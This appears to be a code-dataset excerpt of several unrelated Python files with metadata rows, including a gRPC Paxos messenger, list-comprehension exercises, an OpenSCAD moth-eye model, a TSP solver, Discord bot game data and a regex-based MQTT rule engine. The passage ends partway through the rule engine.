# fetch the stub for each of the acceptors
stub = self._fetch_stub(acceptor)
if stub is None:
return False
# create the appropriate request
request = paxos_pb2.PrepareRequest(proposal_number = p,
decree_number = n, proposer = self.name)
# finally send message to this acceptor
response = stub.handle_prepare.future(request, TIMEOUT_SECONDS)
response.add_done_callback(ignore)
return True
def send_accept(self, p, n, v, quorum):
for acceptor in quorum:
# fetch the stub for each of the acceptors
stub = self._fetch_stub(acceptor)
if stub is None:
return False
# create the appropriate request
request = paxos_pb2.AcceptRequest(proposal_number = p,
decree_number = n, value = v, proposer = self.name)
# finally send message to this acceptor
response = stub.handle_accept.future(request, TIMEOUT_SECONDS)
response.add_done_callback(ignore_accept)
return True
def send_promise(self, had_previous, p, proposer, n, v, dest):
# fetch the stub for the proposer
stub = self._fetch_stub(dest)
if stub is None:
return False
# create the appropriate request
request = paxos_pb2.PromiseRequest(had_previous = had_previous, proposal_number = p,
proposer = proposer, decree_number = n, value = v, acceptor = self.name)
# finally send promise back to proposer
response = stub.handle_promise.future(request, TIMEOUT_SECONDS)
response.add_done_callback(ignore_promise)
return True
def send_refuse(self, p, proposer, n, dest):
# fetch the stub for the proposer
stub = self._fetch_stub(dest)
if stub is None:
return False
# create the appropriate request
request = paxos_pb2.RefuseRequest(proposal_number = p,
proposer = proposer, decree_number = n, acceptor = self.name)
# finally send refusal back to proposer
response = stub.handle_refuse.future(request, TIMEOUT_SECONDS)
response.add_done_callback(ignore_refuse)
return True
def send_learn(self, p, proposer, n, v, learner):
# fetch the stub for the learner
stub = self._fetch_stub(learner)
if stub is None:
return False
# create the appropriate request
request = paxos_pb2.LearnRequest(proposal_number = p, proposer = proposer,
decree_number = n, value = v, acceptor = self.name)
# finally send message to learner
response = stub.handle_learn.future(request, TIMEOUT_SECONDS)
response.add_done_callback(ignore_learn)
        return True
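# Minimal usage sketch (illustrative only; the peer name and host/port values
# are placeholders, and a running paxos_pb2 gRPC server is assumed):
#
#   messenger = grpcMessenger('proposer-1')
#   messenger.add_destination('acceptor-1', 'localhost', 50051)
#   quorum = messenger.get_quorum()
#   messenger.send_prepare(p=1, n=0, quorum=quorum)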
| en | 0.755061 | This module provides an implementation of the Messenger class using Google's RPC Protocol (gRPC). For the specific documentation of the arguments these methods take and what they do at a high level, refer to messenger.py. # fetch the stub for the proposer # uses gRPC to create a channel and a stub # simply change the entry; do not check if it already exists # function always succeeds # fetch the stub for each of the acceptors # create the appropriate request # finally send message to this acceptor # fetch the stub for each of the acceptors # create the appropriate request # finally send message to this acceptor # fetch the stub for the proposer # create the appropriate request # finally send promise back to proposer # fetch the stub for the proposer # create the appropriate request # finally send refusal back to proposer # fetch the stub for the learner # create the appropriate request # finally send message to learner | 2.82703 | 3 |
ch20/ListComprehensionsandFunctionalTools.py | eroicaleo/LearningPython | 1 | 6616758 | #!/usr/local/bin/python3.3
res = map(ord, 'spam')
print(list(res))
res = [ord(x) for x in 'spam']
print(res)
print([x ** 2 for x in range(10)])
print(list(map(lambda x: x ** 2, range(10))))
print([x for x in range(5) if x % 2 == 0])
print(list(filter(lambda x: x % 2 == 0, range(5))))
print([x ** 2 for x in range(10) if x % 2 == 0])
print(list(map(lambda x: x ** 2, filter(lambda x: x % 2 == 0, range(10)))))
print([x+y for x in [0, 1, 2] for y in [100, 200, 300]])
print([x+y for x in 'spam' for y in 'SPAM'])
print([(x, y) for x in range(5) if x % 2 == 0 for y in range(5) if y % 2 == 1])
M = [[y+x for y in range(3)] for x in [1, 4, 7]]
print(M)
N = [[x] * 3 for x in [1, 2, 3]]
print(N)
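# For reference, the nested comprehension that built M, unrolled into
# equivalent explicit loops:
M2 = []
for x in [1, 4, 7]:
    row = []
    for y in range(3):
        row.append(y + x)
    M2.append(row)
print(M2)  # same as M: [[1, 2, 3], [4, 5, 6], [7, 8, 9]]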
| en | 0.645071 | #!/usr/local/bin/python3.3 | 3.3796 | 3 |
moth-goggles.py | AbstractGeek/moth-goggles | 0 | 6616759 | #!/usr/bin/env python
import solid
import solid.utils as sutil
import numpy as np
# Output file settings
filename = "moth-goggles.scad"
SEGMENTS = 20
# Model settings
outer_sphere_radius = 35 # mm
inner_sphere_radius = 20 # mm
ommatidum_angle = 5 # deg
ommatidum_radius = np.tan(ommatidum_angle * np.pi / 180) * outer_sphere_radius
thickness = 0.25
def sph2cart(radius, azimuth, elevation):
"""Convert spherical coordinates to cartesian coordinates."""
x = radius * np.cos(elevation * np.pi / 180) * \
np.cos(azimuth * np.pi / 180)
y = radius * np.cos(elevation * np.pi / 180) * \
np.sin(azimuth * np.pi / 180)
z = radius * np.sin(elevation * np.pi / 180)
return x, y, z
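# Quick sanity check (values approximate): sph2cart(1, 0, 0) -> (1.0, 0.0, 0.0)
# and sph2cart(1, 90, 0) -> (~0.0, 1.0, 0.0).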
def create_ommatidum(outer_sphere_radius,
inner_sphere_radius, ommatidum_radius):
"""Create an hexagonal based pyramid."""
# Outer shell
outer_shell = [tuple(np.round(sph2cart(ommatidum_radius, az, 0), 2))
for az in np.arange(0, 359, 60)]
outer_points = [[0, 0, 0]] + [[outer_sphere_radius, x, y]
for x, y, _ in outer_shell]
# Inner shell
inner_shell = [tuple(np.round(
sph2cart(ommatidum_radius - thickness, az, 0), 2))
for az in np.arange(0, 359, 60)]
inner_points = [[0, 0, 0]] + [[outer_sphere_radius, x, y]
for x, y, _ in inner_shell]
# Define Faces
faces = [
[0, 1, 2],
[0, 2, 3],
[0, 3, 4],
[0, 4, 5],
[0, 5, 6],
[0, 6, 1],
[1, 2, 3, 4, 5, 6]]
# Create ommatidum
ommatidum = solid.difference()(
solid.hull()(solid.polyhedron(outer_points, faces)),
solid.hull()(solid.polyhedron(inner_points, faces)),
solid.sphere(inner_sphere_radius)
)
return ommatidum
def create_moth_eye(ommatidum, ommatidum_radius, sphere_radius):
"""Create moth eye using ommatidia."""
# Elevation angle correction
el_step = np.arctan2(
ommatidum_radius * np.cos(30.0 * np.pi / 180.0),
sphere_radius) * 180 / np.pi
elevation = np.arange(-45, 45, 2 * (el_step))
moth_eye = solid.union()
for el in elevation:
curr_radius = sphere_radius * np.cos(el * np.pi / 180)
az_step = np.arctan2(ommatidum_radius, curr_radius) * 180 / np.pi
azimuth = np.arange(0, 180, 2 * az_step)
for az in azimuth:
moth_eye.add(solid.rotate([0, el, az])(ommatidum))
return moth_eye
ommatidum = create_ommatidum(outer_sphere_radius,
inner_sphere_radius, ommatidum_radius)
moth_eye = create_moth_eye(ommatidum, ommatidum_radius, outer_sphere_radius)
solid.scad_render_to_file(moth_eye, filename,
                          file_header='$fn = %s;' % SEGMENTS)
| en | 0.560488 | #!/usr/bin/env python # Output file settings # Model settings # mm # mm # deg Convert spherical coordinates to cartesian coordinates. Create an hexagonal based pyramid. # Outer shell # Inner shell # Define Faces # Create ommatidum Create moth eye using ommatidia. # Elevation angle correction | 2.743034 | 3 |
bio_embeddings/utilities/filemanagers/__init__.py | kvetab/bio_embeddings | 219 | 6616760 | <filename>bio_embeddings/utilities/filemanagers/__init__.py
from bio_embeddings.utilities.filemanagers.FileSystemFileManager import FileSystemFileManager
from bio_embeddings.utilities.filemanagers.FileManagerInterface import FileManagerInterface
def get_file_manager(**kwargs):
# A useless call to pacify the linters
# TODO: when new FileManagers are available, parse the file manager type from "management".
kwargs.get('management', {})
    return FileSystemFileManager()
| en | 0.543521 | # A useless call to pacify the linters # TODO: when new FileManagers are available, parse the file manager type from "management". | 1.768004 | 2 |
codes/python-scripts/print_rodrigues_R.py | karolmajek/observation_equations | 6 | 6616761 | <reponame>karolmajek/observation_equations
from sympy import *
from rodrigues_R_utils import *
T_x, T_y, T_z = symbols('T_x T_y T_z')
s_x, s_y, s_z = symbols('s_x s_y s_z')
RT_wc = matrix44FromRodrigues(T_x, T_y, T_z, s_x, s_y, s_z)
print(RT_wc)
print(latex(RT_wc)) | none | 1 | 2.520545 | 3 |
mlrose.py | svaningelgem/traveling_salesman_leuven | 0 | 6616762 | from itertools import combinations
import mlrose_hiive as mlrose
from common import check_time, coordinates, distance, write_gps_file
# Create list of distances between pairs of cities
dist_list = [
(x, y, distance(coordinates[x], coordinates[y]))
for x, y in combinations(range(len(coordinates)), r=2)
]
def main():
# Source: https://mlrose.readthedocs.io/en/stable/source/tutorial2.html#solving-tsps-with-mlrose
fitness_dists = mlrose.TravellingSales(distances=dist_list)
problem_fit = mlrose.TSPOpt(length=len(coordinates), fitness_fn=fitness_dists, maximize=False)
best_state, best_fitness, _ = mlrose.genetic_alg(problem_fit, max_iters=20)
print("Best length after optimization: ", best_fitness)
write_gps_file(coordinates[best_state, :], 'Leuven')
if __name__ == '__main__':
with check_time():
        main()
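# A possible tuned call (parameter names follow the mlrose-hiive genetic_alg
# signature; the values shown are illustrative, not from this script):
#   best_state, best_fitness, _ = mlrose.genetic_alg(
#       problem_fit, pop_size=200, mutation_prob=0.1,
#       max_attempts=10, max_iters=100, random_state=42)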
| en | 0.843429 | # Create list of distances between pairs of cities # Source: https://mlrose.readthedocs.io/en/stable/source/tutorial2.html#solving-tsps-with-mlrose | 3.185742 | 3 |
bot/cfg/bbData.py | GOF2BountyBot/GOF2BountyBot | 1 | 6616763 | <gh_stars>1-10
from discord import Colour
# all factions recognised by BB
factions = ["terran", "vossk", "midorian", "nivelian", "neutral"]
# all factions usable in bounties
bountyFactions = ["terran", "vossk", "midorian", "nivelian"]
# levels of security in SolarSystems (SolarSystem security is stored as an index in this list)
securityLevels = ["secure", "average", "risky", "dangerous"]
# map image URLS for cmd_map
mapImageWithGraphLink = "https://cdn.discordapp.com/attachments/700683544103747594/700683693215318076/gof2_coords.png"
mapImageNoGraphLink = 'https://i.imgur.com/TmPgPd3.png'
# icons for factions
factionIcons = {"terran": "https://cdn.discordapp.com/attachments/700683544103747594/711013574331596850/terran.png",
"vossk": "https://cdn.discordapp.com/attachments/700683544103747594/711013681621893130/vossk.png",
"midorian": "https://cdn.discordapp.com/attachments/700683544103747594/711013601019691038/midorian.png",
"nivelian": "https://cdn.discordapp.com/attachments/700683544103747594/711013623257890857/nivelian.png",
"neutral":
"https://emojipedia-us.s3.dualstack.us-west-1.amazonaws.com/thumbs/120/twitter/248/rocket_1f680.png",
"void": "https://cdn.discordapp.com/attachments/700683544103747594/711013699841687602/void.png"}
errorIcon = "https://emojipedia-us.s3.dualstack.us-west-1.amazonaws.com/thumbs/120/twitter/248/exclamation-mark_2757.png"
winIcon = "https://emojipedia-us.s3.dualstack.us-west-1.amazonaws.com/thumbs/120/twitter/248/trophy_1f3c6.png"
rocketIcon = "https://emojipedia-us.s3.dualstack.us-west-1.amazonaws.com/thumbs/120/twitter/248/rocket_1f680.png"
# colours to use in faction-related embed strips
factionColours = { "terran": Colour.gold(),
"vossk": Colour.dark_green(),
"midorian": Colour.dark_red(),
"nivelian": Colour.dark_blue(),
"neutral": Colour.purple()}
# Data representing all ship items in the game. These are used to create bbShip objects,
# which are stored in builtInShipObjs in a similar dict format.
# Ships do not have tech levels in GOF2, so tech levels will be automatically generated
# for the sake of the bot during bot.on_ready.
builtInShipData = {}
# Data representing all module items in the game. These are used to create bbModule objects,
# which are stored in builtInModuleObjs in a similar dict format.
builtInModuleData = {}
# Data representing all primary weapon items in the game. These are used to create bbWeapon objects,
# which are stored in builtInWeaponObjs in a similar dict format.
builtInWeaponData = {}
# Data representing all ship upgrades in the game. These are used to create bbShipUpgrade objects,
# which are stored in builtInUpgradeObjs in a similar dict format.
builtInUpgradeData = {}
# data for builtIn criminals to be used in Criminal.fromDict
# criminals marked as not builtIn to allow for dictionary init.
# The criminal object is then marked as builtIn during bot.on_ready
builtInCriminalData = {}
# data for builtIn systems to be used in SolarSystem.fromDict
builtInSystemData = {}
# data for builtIn Turrets to be used in bbTurret.fromDict
builtInTurretData = {}
# data for builtIn commodities to be used in bbCommodity.fromDict (unimplemented)
builtInCommodityData = {}
builtInToolData = {}
# data for builtIn secondaries to be used in bbSecondary.fromDict (unimplemented)
builtInSecondariesData = {}
# data for builtIn ShipSkins to be used in ShipSkin.fromDict
builtInShipSkinsData = {}
# Objects representing all ship skins in the game.
builtInShipSkins = {}
builtInToolObjs = {}
# To be populated during bot.on_ready
# These dicts contain item name: item object for the object described in the variable name.
# This is primarily for use in their relevant fromDict functions.
builtInSystemObjs = {}
builtInCriminalObjs = {}
builtInModuleObjs = {}
builtInWeaponObjs = {}
builtInUpgradeObjs = {}
builtInTurretObjs = {}
# References to the above item objects, sorted by techLevel.
shipKeysByTL = []
moduleObjsByTL = []
weaponObjsByTL = []
turretObjsByTL = []
# names of criminals in builtIn bounties
bountyNames = {}
# the length of the longest criminal name, to be used in padding during cmd_bounties
longestBountyNameLength = 0 | en | 0.914854 | # all factions recognised by BB # all factions useable in bounties # levels of security in SolarSystems (SolarSystem security is stored as an index in this list) # map image URLS for cmd_map # icons for factions # colours to use in faction-related embed strips # Data representing all ship items in the game. These are used to create bbShip objects, # which are stored in builtInShipObjs in a similar dict format. # Ships to not have tech levels in GOF2, so tech levels will be automaticaly generated # for the sake of the bot during bot.on_ready. # Data representing all module items in the game. These are used to create bbModule objects, # which are stored in builtInModuleObjs in a similar dict format. # Data representing all primary weapon items in the game. These are used to create bbWeapon objects, # which are stored in builtInWeaponObjs in a similar dict format. # Data representing all ship upgrades in the game. These are used to create bbShipUpgrade objects, # which are stored in builtInUpgradeObjs in a similar dict format. # data for builtIn criminals to be used in Criminal.fromDict # criminals marked as not builtIn to allow for dictionary init. # The criminal object is then marked as builtIn during bot.on_ready # data for builtIn systems to be used in SolarSystem.fromDict # data for builtIn Turrets to be used in bbTurret.fromDict # data for builtIn commodities to be used in bbCommodity.fromDict (unimplemented) # data for builtIn secondaries to be used in bbSecondary.fromDict (unimplemented) # data for builtIn ShipSkins to be used in ShipSkin.fromDict # Objects representing all ship skins in the game. # To be populated during bot.on_ready # These dicts contain item name: item object for the object described in the variable name. # This is primarily for use in their relevent fromDict functions. # References to the above item objects, sorted by techLevel. # names of criminals in builtIn bounties # the length of the longest criminal name, to be used in padding during cmd_bounties | 1.944692 | 2 |
Chapter 13/ch13_16_7.py | bpbpublications/TEST-YOUR-SKILLS-IN-PYTHON-LANGUAGE | 0 | 6616764 | lines=["Hello Everyone!\n", "Welcome to File Handling.\n"]
f=open("myfile.txt", "w")
f.writelines(lines)
f.close() | lines=["Hello Everyone!\n", "Welcome to File Handling.\n"]
f=open("myfile.txt", "w")
f.writelines(lines)
f.close() | none | 1 | 2.976976 | 3 | |
Daily_challege/Day3/MaxProfit_StockShellBuy.py | pavi-ninjaac/leetcode | 0 | 6616765 | <filename>Daily_challege/Day3/MaxProfit_StockShellBuy.py
# -*- coding: utf-8 -*-
"""
Created on Wed Apr 7 11:07:42 2021
@author: ELCOT
"""
class Solution:
def maxProfit(self, prices):
buy = 1000000000
profit = 0
for i in prices:
if i<buy:
buy = i
profit_ = i - buy
if profit_>profit:
profit = profit_
return profit
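# Trace for [7,1,5,3,6,4]: buy tracks the running minimum price (7, then 1),
# profit_ = i - buy is evaluated each day (0, 0, 4, 2, 5, 3), so the maximum
# single-transaction profit returned is 5 (buy at 1, sell at 6).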
Solution().maxProfit([7,1,5,3,6,4]) | en | 0.771052 | # -*- coding: utf-8 -*- Created on Wed Apr 7 11:07:42 2021
@author: ELCOT | 3.678746 | 4 |
src/FileManager.py | rfebbo/SpudScale | 1 | 6616766 | #!/usr/bin/python3
# -*- coding: utf-8 -*-
import csv
def readData(fileName):
history = []
with open(fileName, newline='') as csvfile:
reader = csv.reader(csvfile)
for row in reader:
history.append(row)
return history
def writeData(fileName, readout):
with open(fileName, 'a', newline='') as csvfile:
writer = csv.writer(csvfile, 'excel')
        writer.writerow(readout)
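# Hypothetical round trip ('scale.csv' is a placeholder path):
#   writeData('scale.csv', ['2021-01-01 12:00', '4.2'])
#   readData('scale.csv')   # -> [['2021-01-01 12:00', '4.2']]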
| en | 0.390086 | #!/usr/bin/python3 # -*- coding: utf-8 -*- | 3.595713 | 4 |
light-cep/core/cep.py | KuaJnio/light-cep | 0 | 6616767 | <gh_stars>0
from time import time, sleep
from re import search
from threading import Thread, Lock
from json import JSONEncoder, load, dump
import logging
class PayloadConsumer(Thread):
def __init__(self, payload, rules_handler, regexs_handler, database_handler):
Thread.__init__(self)
self.payload = payload
self.rules_handler = rules_handler
self.regexs_handler = regexs_handler
self.database_handler = database_handler
def look_for_regexs(self):
try:
result = []
for regex in self.regexs_handler.regexs:
r = search(self.regexs_handler.regexs[regex], self.payload)
if r is not None:
result.append(regex)
return result
except Exception as e:
logging.error('Error in PayloadConsumer.look_for_regexs: ' + str(e))
return result
def run(self):
try:
matches = self.look_for_regexs()
for match in matches:
timestamp = int(time())
self.database_handler.insert_match(timestamp, match)
self.rules_handler.handle_match(match, self.payload)
logging.debug("Got match for regex " + match)
except Exception as e:
logging.error('Error in PayloadConsumer.run: ' + str(e))
class RegexsHandler(object):
def __init__(self):
try:
self.regexs = {}
except Exception as e:
logging.error('Error in RegexsHandler.__init__: ' + str(e))
def add_regex(self, name, value):
try:
self.regexs[name] = value
logging.debug("Added regex " + name + " : " + value)
except Exception as e:
logging.error('Error in RegexsHandler.add_regex: ' + str(e))
def reset(self):
del self.regexs
self.regexs = {}
class Rule(object):
def __init__(self, regexs_yes, regexs_no, window, mode, hold, name, output_topic, mqtt_client):
try:
self.regexs_yes = regexs_yes
self.regexs_no = regexs_no
self.window = window
self.mode = mode
self.hold = hold
self.name = name
self.mqtt_client = mqtt_client
self.output_topic = output_topic
self.callback_template = None
self.pending = False
self.remaining_regexs = list(self.regexs_yes)
self.start_time = None
self.completed = False
self.completed_time = None
self.triggering_payloads = {}
except Exception as e:
logging.error('Error in Rule.__init__: ' + str(e))
def has_regex(self, regex):
try:
if not len(self.remaining_regexs) == 0:
if self.mode == "strict":
if self.remaining_regexs[0] == regex:
return True
else:
return False
else:
if regex in self.remaining_regexs:
return True
else:
return False
else:
return False
except Exception as e:
logging.error('Error in Rule.has_regex: ' + str(e))
return False
def is_completed(self):
return self.completed
def complete(self):
self.completed = True
self.completed_time = time()
def is_finished(self):
res = False
if ((len(self.remaining_regexs) == 0) or (self.mode == "one")):
res = True
return res
def is_expired(self):
return time() - self.start_time > self.window
def is_on_hold(self):
return time() - self.completed_time < self.hold
def del_regex(self, regex):
try:
del self.remaining_regexs[self.remaining_regexs.index(regex)]
except Exception as e:
logging.error('Error in Rule.del_regex: ' + str(e))
def reset_rule(self):
try:
self.pending = False
self.completed = False
self.completed_time = None
self.remaining_regexs = list(self.regexs_yes)
self.triggering_payloads = {}
self.callback_payload = ""
except Exception as e:
logging.error('Error in Rule.reset_rule: ' + str(e))
def start_rule(self):
try:
self.pending = True
self.start_time = time()
logging.debug("Initiated rule " + self.name)
except Exception as e:
logging.error('Error in Rule.start_rule: ' + str(e))
def callback(self):
try:
#TODO support jinja template to format callback payload
self.callback_payload = JSONEncoder().encode(
{
"timestamp": int(time()),
"name": self.name,
"triggering_payload": self.triggering_payloads
}
)
logging.info('Triggered rule \'' + self.name + '\'')
self.mqtt_client.publish(self.output_topic, self.callback_payload)
except Exception as e:
logging.error('Error in Rule.callback: ' + str(e))
class RulesHandler(Thread):
def __init__(self, database_handler):
Thread.__init__(self)
self.rules = []
self.database_handler = database_handler
def add_rule(self, rule):
try:
self.rules.append(rule)
except Exception as e:
logging.error('Error in RulesHandler.add_rule: ' + str(e))
def check_rules(self):
try:
for rule in self.rules:
if rule.pending:
if rule.completed:
if rule.is_on_hold():
pass
else:
trigger = True
for value in rule.regexs_no:
timestamp = int(time()) - rule.regexs_no[value]
if self.database_handler.check_for_value(timestamp, value):
logging.debug("Cancelling rule " + rule.name + " because \'regex_no\' " + value + " was found in the last " + str(rule.regexs_no[value]) + " seconds")
trigger = False
if trigger:
rule.callback()
else:
pass
rule.reset_rule()
else:
if rule.is_finished():
rule.complete()
elif rule.is_expired():
rule.reset_rule()
logging.debug("Reseted rule " + rule.name + " because of expiration")
except Exception as e:
logging.error('Error in RulesHandler.check_rules: ' + str(e))
def handle_match(self, name, payload):
try:
for rule in self.rules:
if rule.pending:
if rule.has_regex(name):
rule.del_regex(name)
rule.triggering_payloads[name] = payload
else:
if rule.has_regex(name):
rule.start_rule()
rule.triggering_payloads[name] = payload
rule.del_regex(name)
except Exception as e:
logging.error('Error in RulesHandler.handle_match: ' + str(e))
def reset(self):
del self.rules
self.rules = []
def run(self):
try:
while True:
self.check_rules()
sleep(0.05)
except Exception as e:
logging.error('Error in RulesHandler.run: ' + str(e))
def create_rules_handler(database_handler):
rules_handler = RulesHandler(database_handler)
rules_handler.daemon = True
rules_handler.start()
return rules_handler
def create_rule(regexs_yes, regexs_no, window, mode, hold, name, output_topic, mqtt_client, rules_handler):
isPresent = False
for rule in rules_handler.rules:
if rule.name == name:
isPresent = True
if not isPresent:
rule = Rule(regexs_yes, regexs_no, window, mode, hold, name, output_topic, mqtt_client)
rules_handler.add_rule(rule)
logging.debug("Added rule " + name)
else:
logging.error('Tried to add rule with name ' + name + ' but a rule with the same name already exists, aborting...')
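# Minimal wiring sketch (illustrative; `db` and `mqtt` stand in for the
# application-provided database handler and MQTT client, which this module
# does not define):
#
#   regexs = RegexsHandler()
#   regexs.add_regex('login_fail', r'authentication failure')
#   rules = create_rules_handler(db)
#   create_rule(regexs_yes=['login_fail'], regexs_no={}, window=60, mode='one',
#               hold=10, name='brute-force', output_topic='alerts',
#               mqtt_client=mqtt, rules_handler=rules)
#   PayloadConsumer('authentication failure for user root', rules, regexs, db).start()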
class ConfigHandler(object):
def __init__(self):
self.file_name = "core/config.json"
self.lock = Lock()
def get_config(self):
self.lock.acquire()
with open(self.file_name, 'r') as f:
data = load(f)
self.lock.release()
return data
def has_regex(self, name):
self.lock.acquire()
with open(self.file_name, 'r') as f:
data = load(f)
self.lock.release()
return name in data['regexs']
def add_regex(self, name, regex):
self.lock.acquire()
with open(self.file_name, 'r+') as f:
data = load(f)
data['regexs'][name] = regex
f.seek(0)
dump(data, f, indent=4)
f.truncate()
self.lock.release()
def del_regex(self, name):
self.lock.acquire()
with open(self.file_name, 'r+') as f:
data = load(f)
del data['regexs'][name]
f.seek(0)
dump(data, f, indent=4)
f.truncate()
self.lock.release()
def get_regexs(self):
self.lock.acquire()
with open(self.file_name, 'r') as f:
data = load(f)
self.lock.release()
return data['regexs']
def get_regex_by_name(self, name):
self.lock.acquire()
with open(self.file_name, 'r') as f:
data = load(f)
self.lock.release()
return data['regexs'][name]
def enable_regex(self, name):
self.lock.acquire()
with open(self.file_name, 'r+') as f:
data = load(f)
data['regexs'][name]['enabled'] = True
f.seek(0)
dump(data, f, indent=4)
f.truncate()
self.lock.release()
def disable_regex(self, name):
self.lock.acquire()
with open(self.file_name, 'r+') as f:
data = load(f)
data['regexs'][name]['enabled'] = False
f.seek(0)
dump(data, f, indent=4)
f.truncate()
self.lock.release()
def has_rule(self, name):
self.lock.acquire()
with open(self.file_name, 'r') as f:
data = load(f)
self.lock.release()
return name in data['rules']
def add_rule(self, name, rule):
self.lock.acquire()
with open(self.file_name, 'r+') as f:
data = load(f)
data['rules'][name] = rule
f.seek(0)
dump(data, f, indent=4)
f.truncate()
self.lock.release()
def del_rule(self, name):
self.lock.acquire()
with open(self.file_name, 'r+') as f:
data = load(f)
del data['rules'][name]
f.seek(0)
dump(data, f, indent=4)
f.truncate()
self.lock.release()
def get_rules(self):
self.lock.acquire()
with open(self.file_name, 'r') as f:
data = load(f)
self.lock.release()
return data['rules']
def get_rule_by_name(self, name):
self.lock.acquire()
with open(self.file_name, 'r') as f:
data = load(f)
self.lock.release()
return data['rules'][name]
def enable_rule(self, name):
self.lock.acquire()
with open(self.file_name, 'r+') as f:
data = load(f)
data['rules'][name]['enabled'] = True
f.seek(0)
dump(data, f, indent=4)
f.truncate()
self.lock.release()
def disable_rule(self, name):
self.lock.acquire()
with open(self.file_name, 'r+') as f:
data = load(f)
data['rules'][name]['enabled'] = False
f.seek(0)
dump(data, f, indent=4)
f.truncate()
self.lock.release()
def is_regex(self, data):
if len(data) == 2 and 'value' in data and 'enabled' in data:
if isinstance(data['value'], str) and isinstance(data['enabled'], bool):
pass
else:
return False
else:
return False
return True
def is_rule(self, data):
if len(data) == 8 and 'enabled' in data and 'name' in data and 'regexs_yes' in data and 'regexs_no' in data and 'mode' in data and 'hold' in data and 'window' in data and 'output_topic' in data:
if isinstance(data['enabled'], bool) and isinstance(data['name'], str) and isinstance(data['regexs_yes'], dict) and isinstance(data['regexs_no'], dict) and isinstance(data['mode'], str) and isinstance(data['window'], int) and isinstance(data['hold'], int) and isinstance(data['output_topic'], str):
for regex in data['regexs_yes']:
if isinstance(data['regexs_yes'][regex], str):
pass
else:
return False
else:
return False
else:
return False
return True
def is_config(self, data):
if len(data) == 2 and 'regexs' in data and 'rules' in data:
if isinstance(data['regexs'], dict) and isinstance(data['rules'], dict):
for regex in data['regexs']:
if self.is_regex(data['regexs'][regex]):
pass
else:
return False
for rule in data['rules']:
if self.is_rule(data['rules'][rule]):
pass
else:
return False
else:
return False
else:
return False
return True
| from time import time, sleep
from re import search
from threading import Thread, Lock
from json import JSONEncoder, load, dump
import logging
class PayloadConsumer(Thread):
def __init__(self, payload, rules_handler, regexs_handler, database_handler):
Thread.__init__(self)
self.payload = payload
self.rules_handler = rules_handler
self.regexs_handler = regexs_handler
self.database_handler = database_handler
def look_for_regexs(self):
try:
result = []
for regex in self.regexs_handler.regexs:
r = search(self.regexs_handler.regexs[regex], self.payload)
if r is not None:
result.append(regex)
return result
except Exception as e:
logging.error('Error in PayloadConsumer.look_for_regexs: ' + str(e))
return result
def run(self):
try:
matches = self.look_for_regexs()
for match in matches:
timestamp = int(time())
self.database_handler.insert_match(timestamp, match)
self.rules_handler.handle_match(match, self.payload)
logging.debug("Got match for regex " + match)
except Exception as e:
logging.error('Error in PayloadConsumer.run: ' + str(e))
class RegexsHandler(object):
def __init__(self):
try:
self.regexs = {}
except Exception as e:
logging.error('Error in RegexsHandler.__init__: ' + str(e))
def add_regex(self, name, value):
try:
self.regexs[name] = value
logging.debug("Added regex " + name + " : " + value)
except Exception as e:
logging.error('Error in RegexsHandler.add_regex: ' + str(e))
def reset(self):
del self.regexs
self.regexs = {}
class Rule(object):
def __init__(self, regexs_yes, regexs_no, window, mode, hold, name, output_topic, mqtt_client):
try:
self.regexs_yes = regexs_yes
self.regexs_no = regexs_no
self.window = window
self.mode = mode
self.hold = hold
self.name = name
self.mqtt_client = mqtt_client
self.output_topic = output_topic
self.callback_template = None
self.pending = False
self.remaining_regexs = list(self.regexs_yes)
self.start_time = None
self.completed = False
self.completed_time = None
self.triggering_payloads = {}
except Exception as e:
logging.error('Error in Rule.__init__: ' + str(e))
def has_regex(self, regex):
try:
if not len(self.remaining_regexs) == 0:
if self.mode == "strict":
if self.remaining_regexs[0] == regex:
return True
else:
return False
else:
if regex in self.remaining_regexs:
return True
else:
return False
else:
return False
except Exception as e:
logging.error('Error in Rule.has_regex: ' + str(e))
return False
def is_completed(self):
return self.completed
def complete(self):
self.completed = True
self.completed_time = time()
def is_finished(self):
res = False
if ((len(self.remaining_regexs) == 0) or (self.mode == "one")):
res = True
return res
def is_expired(self):
return time() - self.start_time > self.window
def is_on_hold(self):
return time() - self.completed_time < self.hold
def del_regex(self, regex):
try:
del self.remaining_regexs[self.remaining_regexs.index(regex)]
except Exception as e:
logging.error('Error in Rule.del_regex: ' + str(e))
def reset_rule(self):
try:
self.pending = False
self.completed = False
self.completed_time = None
self.remaining_regexs = list(self.regexs_yes)
self.triggering_payloads = {}
self.callback_payload = ""
except Exception as e:
logging.error('Error in Rule.reset_rule: ' + str(e))
def start_rule(self):
try:
self.pending = True
self.start_time = time()
logging.debug("Initiated rule " + self.name)
except Exception as e:
logging.error('Error in Rule.start_rule: ' + str(e))
def callback(self):
try:
#TODO support jinja template to format callback payload
self.callback_payload = JSONEncoder().encode(
{
"timestamp": int(time()),
"name": self.name,
"triggering_payload": self.triggering_payloads
}
)
logging.info('Triggered rule \'' + self.name + '\'')
self.mqtt_client.publish(self.output_topic, self.callback_payload)
except Exception as e:
logging.error('Error in Rule.callback: ' + str(e))
class RulesHandler(Thread):
def __init__(self, database_handler):
Thread.__init__(self)
self.rules = []
self.database_handler = database_handler
def add_rule(self, rule):
try:
self.rules.append(rule)
except Exception as e:
logging.error('Error in RulesHandler.add_rule: ' + str(e))
def check_rules(self):
try:
for rule in self.rules:
if rule.pending:
if rule.completed:
if rule.is_on_hold():
pass
else:
trigger = True
for value in rule.regexs_no:
timestamp = int(time()) - rule.regexs_no[value]
if self.database_handler.check_for_value(timestamp, value):
logging.debug("Cancelling rule " + rule.name + " because \'regex_no\' " + value + " was found in the last " + str(rule.regexs_no[value]) + " seconds")
trigger = False
if trigger:
rule.callback()
else:
pass
rule.reset_rule()
else:
if rule.is_finished():
rule.complete()
elif rule.is_expired():
rule.reset_rule()
logging.debug("Reseted rule " + rule.name + " because of expiration")
except Exception as e:
logging.error('Error in RulesHandler.check_rules: ' + str(e))
def handle_match(self, name, payload):
try:
for rule in self.rules:
if rule.pending:
if rule.has_regex(name):
rule.del_regex(name)
rule.triggering_payloads[name] = payload
else:
if rule.has_regex(name):
rule.start_rule()
rule.triggering_payloads[name] = payload
rule.del_regex(name)
except Exception as e:
logging.error('Error in RulesHandler.handle_match: ' + str(e))
def reset(self):
del self.rules
self.rules = []
def run(self):
try:
while True:
self.check_rules()
sleep(0.05)
except Exception as e:
logging.error('Error in RulesHandler.run: ' + str(e))
def create_rules_handler(database_handler):
rules_handler = RulesHandler(database_handler)
rules_handler.daemon = True
rules_handler.start()
return rules_handler
def create_rule(regexs_yes, regexs_no, window, mode, hold, name, output_topic, mqtt_client, rules_handler):
isPresent = False
for rule in rules_handler.rules:
